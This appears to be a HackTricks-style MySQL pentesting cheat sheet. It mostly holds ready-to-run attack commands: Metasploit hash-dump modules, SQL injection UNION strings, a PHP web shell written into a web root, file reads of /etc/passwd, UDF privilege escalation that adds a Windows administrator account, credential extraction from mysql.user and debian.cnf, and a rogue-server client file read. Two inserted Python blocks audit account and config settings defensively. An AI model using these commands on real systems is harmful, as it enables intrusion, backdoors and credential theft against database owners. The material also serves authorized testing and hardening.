3306 - Pentesting Mysql

Basic Information

MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). From here.
Default port: 3306
3306/tcp open mysql

Connect

Local

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked for (check someone)

Remote

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Enumeration

Some of the enumeration actions require valid credentials.
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Write any binary data

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Basic & interesting MySQL commands

show databases;
use <database>;
show tables;
describe <table_name>;

select grantee, table_schema, privilege_type FROM information_schema.schema_privileges; #Exact privileges
select user,file_priv from mysql.user where user='root'; #File privileges
select version(); #version
select @@version; #version
select user(); #User
select database(); #database name

#Try to execute code
select do_system('id');
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL arbitrary read file by client

When you use LOAD DATA LOCAL to load the contents of a file into a table, the MySQL or MariaDB server asks the client to read the file and send its contents. So if you can make a mysql client connect to a MySQL server you control, you can read arbitrary files from the client's host. Note that this is the behaviour when using:
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
(Notice the word "local".) Without "local" you get:
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
Initial PoC: https://github.com/allyshka/Rogue-MySql-Server
This paper gives a complete description of the attack and even how to extend it to RCE: https://paper.seebug.org/1113/
An overview of the attack: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

POST

Mysql User

It is very interesting if mysql is running as root (check the user setting in the server config):
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"

Privilege escalation

How to:
  Current level of access
    mysql> select user();
    mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
  Access passwords
    mysql> use mysql
    mysql> select user,password from user;
  Create a new user and grant him privileges
    mysql> create user test identified by 'test';
    mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
  Break into a shell
    mysql> \! cat /etc/passwd
    mysql> \! bash

Privilege Escalation via library

You can find compiled versions of these libraries in sqlmap (locate lib_mysqludf_sys.so and locate lib_mysqludf_sys.dll). Instead of locate you can also use whereis to search for these libraries on the host.

Linux

use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from npn into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('id > /tmp/out.txt');

Windows

USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Extracting MySQL credentials from the database

SELECT User,Host,Password FROM mysql.user;
SELECT User,Host,authentication_string FROM mysql.user;

mysql -u root --password=<PASSWORD> -e "SELECT User,Host,authentication_string FROM mysql.user;"
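As an added example (not part of the original page), a small audit over the output of the query above: it parses the tab-separated rows of SELECT User,Host,plugin,authentication_string,File_priv FROM mysql.user (the plugin and File_priv columns are an assumption on top of the page's query) and flags passwordless accounts, wildcard hosts, pre-4.1 hashes and non-root accounts holding FILE, the privilege behind the load_file/INTO OUTFILE and UDF techniques on this page. The rows and hashes are constructed.

```python
import re
from typing import Dict, List

# Constructed sample of what `mysql -N -e "SELECT User,Host,plugin,authentication_string,File_priv
# FROM mysql.user"` prints (tab-separated). Every row and hash below is invented for the example.
SAMPLE_USERS = """\
root\tlocalhost\tmysql_native_password\t*0123456789ABCDEF0123456789ABCDEF01234567\tY
root\t%\tmysql_native_password\t\tY
webapp\t10.0.0.%\tmysql_native_password\t*FEDCBA9876543210FEDCBA9876543210FEDCBA98\tY
legacy\t%\tmysql_old_password\t0123456789abcdef\tN
svc\tlocalhost\tcaching_sha2_password\t$A$005$CONSTRUCTED-PLACEHOLDER-HASH\tN
"""

COLUMNS = ["User", "Host", "plugin", "authentication_string", "File_priv"]
OLD_HASH = re.compile(r"^[0-9a-f]{16}$", re.I)   # pre-4.1 "old password" hash
NATIVE_HASH = re.compile(r"^\*[0-9A-F]{40}$")     # mysql_native_password: SHA1(SHA1(pw)), unsalted

def parse_rows(text: str) -> List[Dict[str, str]]:
    """Split tab-separated mysql output into dicts keyed by column name."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t")
        if len(fields) != len(COLUMNS):
            raise ValueError(f"unexpected column count in {line!r}")
        rows.append(dict(zip(COLUMNS, fields)))
    return rows

def audit_account(row: Dict[str, str]) -> List[str]:
    """Return the findings for one mysql.user row (empty list when nothing stands out)."""
    acct = f"{row['User']}@{row['Host']}"
    auth = row["authentication_string"]
    findings = []
    if auth == "":
        findings.append(f"{acct}: no password set")
    elif OLD_HASH.match(auth):
        findings.append(f"{acct}: pre-4.1 16-hex hash (mysql_old_password)")
    elif NATIVE_HASH.match(auth) or row["plugin"] == "mysql_native_password":
        findings.append(f"{acct}: unsalted SHA1 hash (mysql_native_password); prefer caching_sha2_password")
    if row["Host"] == "%":
        findings.append(f"{acct}: account accepts connections from any host")
    if row["File_priv"] == "Y" and row["User"] != "root":
        findings.append(f"{acct}: FILE privilege enables load_file()/INTO OUTFILE and UDF drops")
    return findings

def audit(text: str) -> List[str]:
    return [f for row in parse_rows(text) for f in audit_account(row)]
```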

Extracting MySQL credentials from files

Inside /etc/mysql/debian.cnf you can find the plain-text password of the user debian-sys-maint:
cat /etc/mysql/debian.cnf
You can use these credentials to log in to the mysql database.
Inside the file /var/lib/mysql/mysql/user.MYD you can find all the hashes of the MySQL users (the same ones you can extract from mysql.user inside the database).
You can extract them with:
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Enabling logging

You can enable logging of mysql queries inside /etc/mysql/my.cnf by uncommenting the following lines:

Useful files

Configuration Files
  windows
    config.ini
    my.ini
      windows\my.ini
      winnt\my.ini
    <InstDir>/mysql/data/
  unix
    my.cnf
      /etc/my.cnf
      /etc/mysql/my.cnf
      /var/lib/mysql/my.cnf
      ~/.my.cnf
Command History
  ~/.mysql.history
Log Files
  connections.log
  update.log
  common.log
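An added example, not from the original page: a my.cnf audit that parses the configuration files listed above and reports the settings the earlier sections depend on (the user line checked under Mysql User, local-infile for the LOAD DATA LOCAL client read, secure-file-priv behind ERROR 1290, and general_log from Enabling logging). The sample config and its values are constructed.

```python
from typing import Dict, List

SAMPLE_CNF = """\
# constructed sample in my.cnf syntax; values are invented for the example
[client]
local-infile = 1

[mysqld]
user             = root
secure-file-priv = ""
# general_log = 1
skip-name-resolve
"""

TRUE_VALUES = {"", "1", "on", "true", "yes"}  # a bare option with no "=" also counts as enabled

def parse_my_cnf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse my.cnf text into {section: {option: value}}; '-' in option names becomes '_'."""
    sections: Dict[str, Dict[str, str]] = {}
    current = "(none)"                       # options before the first [section] land here
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;!":     # blank line, comment, or !include* directive
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        sections.setdefault(current, {})[key] = value.strip().strip("\"'")
    return sections

def enabled(section: Dict[str, str], option: str) -> bool:
    return option in section and section[option].lower() in TRUE_VALUES

def audit_my_cnf(text: str) -> List[str]:
    """Report the config settings that this page's file-read, file-write and UDF techniques rely on."""
    cfg = parse_my_cnf(text)
    mysqld = cfg.get("mysqld", {})
    findings = []
    if mysqld.get("user") == "root":
        findings.append("[mysqld] user=root: file writes and UDF code would run as root")
    if mysqld.get("secure_file_priv") == "":
        findings.append("[mysqld] secure-file-priv is empty: load_file()/INTO OUTFILE may use any path")
    for sect in ("client", "mysql", "mysqld"):
        if enabled(cfg.get(sect, {}), "local_infile"):
            findings.append(f"[{sect}] local-infile enabled: LOAD DATA LOCAL lets a rogue server read client files")
    if not enabled(mysqld, "general_log"):
        findings.append("[mysqld] general_log off: queries are not being logged")
    return findings
```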

Default MySQL Database/Tables

The default databases are information_schema, mysql, performance_schema and sys; their tables are listed below in that order.
ALL_PLUGINS APPLICABLE_ROLES CHARACTER_SETS CHECK_CONSTRAINTS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENABLED_ROLES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE KEY_CACHES OPTIMIZER_TRACE PARAMETERS PARTITIONS PLUGINS PROCESSLIST PROFILING REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS SYSTEM_VARIABLES TABLES TABLESPACES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS INNODB_LOCKS INNODB_TRX INNODB_SYS_DATAFILES INNODB_FT_CONFIG INNODB_SYS_VIRTUAL INNODB_CMP INNODB_FT_BEING_DELETED INNODB_CMP_RESET INNODB_CMP_PER_INDEX INNODB_CMPMEM_RESET INNODB_FT_DELETED INNODB_BUFFER_PAGE_LRU INNODB_LOCK_WAITS INNODB_TEMP_TABLE_INFO INNODB_SYS_INDEXES INNODB_SYS_TABLES INNODB_SYS_FIELDS INNODB_CMP_PER_INDEX_RESET INNODB_BUFFER_PAGE INNODB_FT_DEFAULT_STOPWORD INNODB_FT_INDEX_TABLE INNODB_FT_INDEX_CACHE INNODB_SYS_TABLESPACES INNODB_METRICS INNODB_SYS_FOREIGN_COLS INNODB_CMPMEM INNODB_BUFFER_POOL_STATS INNODB_SYS_COLUMNS INNODB_SYS_FOREIGN INNODB_SYS_TABLESTATS GEOMETRY_COLUMNS SPATIAL_REF_SYS CLIENT_STATISTICS INDEX_STATISTICS USER_STATISTICS INNODB_MUTEXES TABLE_STATISTICS INNODB_TABLESPACES_ENCRYPTION user_variables INNODB_TABLESPACES_SCRUBBING INNODB_SYS_SEMAPHORE_WAITS
columns_priv column_stats db engine_cost event func general_log gtid_executed gtid_slave_pos help_category help_keyword help_relation help_topic host index_stats innodb_index_stats innodb_table_stats ndb_binlog_index plugin proc procs_priv proxies_priv roles_mapping server_cost servers slave_master_info slave_relay_log_info slave_worker_info slow_log tables_priv table_stats time_zone time_zone_leap_second time_zone_name time_zone_transition time_zone_transition_type transaction_registry user
accounts cond_instances events_stages_current events_stages_history events_stages_history_long events_stages_summary_by_account_by_event_name events_stages_summary_by_host_by_event_name events_stages_summary_by_thread_by_event_name events_stages_summary_by_user_by_event_name events_stages_summary_global_by_event_name events_statements_current events_statements_history events_statements_history_long events_statements_summary_by_account_by_event_name events_statements_summary_by_digest events_statements_summary_by_host_by_event_name events_statements_summary_by_program events_statements_summary_by_thread_by_event_name events_statements_summary_by_user_by_event_name events_statements_summary_global_by_event_name events_transactions_current events_transactions_history events_transactions_history_long events_transactions_summary_by_account_by_event_name events_transactions_summary_by_host_by_event_name events_transactions_summary_by_thread_by_event_name events_transactions_summary_by_user_by_event_name events_transactions_summary_global_by_event_name events_waits_current events_waits_history events_waits_history_long events_waits_summary_by_account_by_event_name events_waits_summary_by_host_by_event_name events_waits_summary_by_instance events_waits_summary_by_thread_by_event_name events_waits_summary_by_user_by_event_name events_waits_summary_global_by_event_name file_instances file_summary_by_event_name file_summary_by_instance global_status global_variables host_cache hosts memory_summary_by_account_by_event_name memory_summary_by_host_by_event_name memory_summary_by_thread_by_event_name memory_summary_by_user_by_event_name memory_summary_global_by_event_name metadata_locks mutex_instances objects_summary_global_by_type performance_timers prepared_statements_instances replication_applier_configuration replication_applier_status replication_applier_status_by_coordinator replication_applier_status_by_worker replication_connection_configuration 
replication_connection_status replication_group_member_stats replication_group_members rwlock_instances session_account_connect_attrs session_connect_attrs session_status session_variables setup_actors setup_consumers setup_instruments setup_objects setup_timers socket_instances socket_summary_by_event_name socket_summary_by_instance status_by_account status_by_host status_by_thread status_by_user table_handles table_io_waits_summary_by_index_usage table_io_waits_summary_by_table table_lock_waits_summary_by_table threads user_variables_by_thread users variables_by_thread
host_summary host_summary_by_file_io host_summary_by_file_io_type host_summary_by_stages host_summary_by_statement_latency host_summary_by_statement_type innodb_buffer_stats_by_schema innodb_buffer_stats_by_table innodb_lock_waits io_by_thread_by_latency io_global_by_file_by_bytes io_global_by_file_by_latency io_global_by_wait_by_bytes io_global_by_wait_by_latency latest_file_io memory_by_host_by_current_bytes memory_by_thread_by_current_bytes memory_by_user_by_current_bytes memory_global_by_current_bytes memory_global_total metrics processlist ps_check_lost_instrumentation schema_auto_increment_columns schema_index_statistics schema_object_overview schema_redundant_indexes schema_table_lock_waits schema_table_statistics schema_table_statistics_with_buffer schema_tables_with_full_table_scans schema_unused_indexes session session_ssl_status statement_analysis statements_with_errors_or_warnings statements_with_full_table_scans statements_with_runtimes_in_95th_percentile statements_with_sorting statements_with_temp_tables sys_config user_summary user_summary_by_file_io user_summary_by_file_io_type user_summary_by_stages user_summary_by_statement_latency user_summary_by_statement_type version wait_classes_global_by_avg_latency wait_classes_global_by_latency waits_by_host_by_latency waits_by_user_by_latency waits_global_by_latency x$host_summary x$host_summary_by_file_io x$host_summary_by_file_io_type x$host_summary_by_stages x$host_summary_by_statement_latency x$host_summary_by_statement_type x$innodb_buffer_stats_by_schema x$innodb_buffer_stats_by_table x$innodb_lock_waits x$io_by_thread_by_latency x$io_global_by_file_by_bytes x$io_global_by_file_by_latency x$io_global_by_wait_by_bytes x$io_global_by_wait_by_latency x$latest_file_io x$memory_by_host_by_current_bytes x$memory_by_thread_by_current_bytes x$memory_by_user_by_current_bytes x$memory_global_by_current_bytes x$memory_global_total x$processlist x$ps_digest_95th_percentile_by_avg_us 
x$ps_digest_avg_latency_distribution x$ps_schema_table_statistics_io x$schema_flattened_keys x$schema_index_statistics x$schema_table_lock_waits x$schema_table_statistics x$schema_table_statistics_with_buffer x$schema_tables_with_full_table_scans x$session x$statement_analysis x$statements_with_errors_or_warnings x$statements_with_full_table_scans x$statements_with_runtimes_in_95th_percentile x$statements_with_sorting x$statements_with_temp_tables x$user_summary x$user_summary_by_file_io x$user_summary_by_file_io_type x$user_summary_by_stages x$user_summary_by_statement_latency x$user_summary_by_statement_type x$wait_classes_global_by_avg_latency x$wait_classes_global_by_latency x$waits_by_host_by_latency x$waits_by_user_by_latency x$waits_global_by_latency

HackTricks Automatic Commands

Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for MySql
  Note: |
    MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

    https://book.hacktricks.xyz/pentesting/pentesting-mysql

Entry_2:
  Name: Nmap
  Description: Nmap with MySql Scripts
  Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
  Name: MySql
  Description: Attempt to connect to mysql server
  Command: mysql -h {IP} -u {Username}@localhost